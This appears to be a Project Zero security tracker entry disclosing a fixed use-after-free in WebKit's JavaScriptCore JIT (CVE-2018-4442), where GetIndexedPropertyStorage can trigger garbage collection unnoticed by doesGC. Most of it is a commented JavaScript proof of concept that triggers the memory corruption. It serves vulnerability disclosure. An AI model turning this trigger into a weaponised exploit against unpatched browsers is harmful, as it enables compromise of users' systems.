Issue metadata

Status: Fixed
Owner:
Closed: Jan 10
Cc:
Issue 1699: WebKit: JSC: JIT: GetIndexedPropertyStorage can GC

Reported by lokihardt@google.com, Oct 16 Project Member

Issue description

The doesGC function simply takes a node, and tells if it might cause a garbage collection. This function is used to determine whether to insert write barriers. But it's missing GetIndexedPropertyStorage that can cause a garbage collection via rope strings. As a result, it can lead to UaF.

PoC:
function gc() {
    // Allocate large buffers to put pressure on the heap and force a garbage collection.
    for (let i = 0; i < 10; i++) {
        new ArrayBuffer(1024 * 1024 * 10);
    }
}

function opt(arr) {
    let r = /a/;
    let o = {};

    // Once this function is JIT-compiled, these indexed string reads are lowered to
    // GetIndexedPropertyStorage, which the bug report says can GC via rope strings.
    arr[0].charAt(0);
    arr[1].charAt(0);
    arr[2].charAt(0);
    arr[3].charAt(0);
    arr[4].charAt(0);
    arr[5].charAt(0);
    arr[6].charAt(0);
    arr[7].charAt(0);
    arr[8].charAt(0);
    arr[8].charAt(0);
    arr[9].charAt(0);

    // Store into o after the node that can GC; this is the write that doesGC
    // decides (wrongly, here) does not need a write barrier.
    o.x = 'a'.match(r);

    return o;
}

function main() {
    // Warm up opt() with flat strings so the JIT optimizes it.
    for (let i = 0; i < 10000; i++) {
        opt(['a' + i, 'b' + i, 'c' + i, 'd' + i, 'e' + i, 'f' + i, 'g' + i, 'h' + i, 'i' + i, 'j' + i]);
    }

    let a = 'a'.repeat(1024 * 1024 * 2);
    let b = 'a'.repeat(1024 * 1024 * 2);

    // Concatenating two large strings produces rope strings; resolving them
    // inside the optimized code is what triggers the collection.
    let arr = [];
    for (let i = 0; i < 10; i++) {
        arr[i] = a + b;
    }

    gc();

    let o = opt(arr);

    gc();

    let tmp = [1234];

    print(o.x);  // 1234 on an affected build
}

main();

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Comment 1 by lokihardt@google.com, Oct 16

Project Member

Comment 2 by lokihardt@google.com, Oct 16

Project Member

Comment 3 by lokihardt@google.com, Oct 16

Project Member
Summary: WebKit: JSC: JIT: GetIndexedPropertyStorage can GC (was: WebKit: JSC: JIT: Bugs in doesGC)
The real problem was GetIndexedPropertyStorage.

Comment 5 by lokihardt@google.com, Oct 16

Project Member

Comment 6 by lokihardt@google.com, Jan 10

Project Member
Status: Fixed (was: New)

Comment 7 by lokihardt@google.com, Jan 16

Project Member
Labels: -Restrict-View-Commit CVE-2018-4442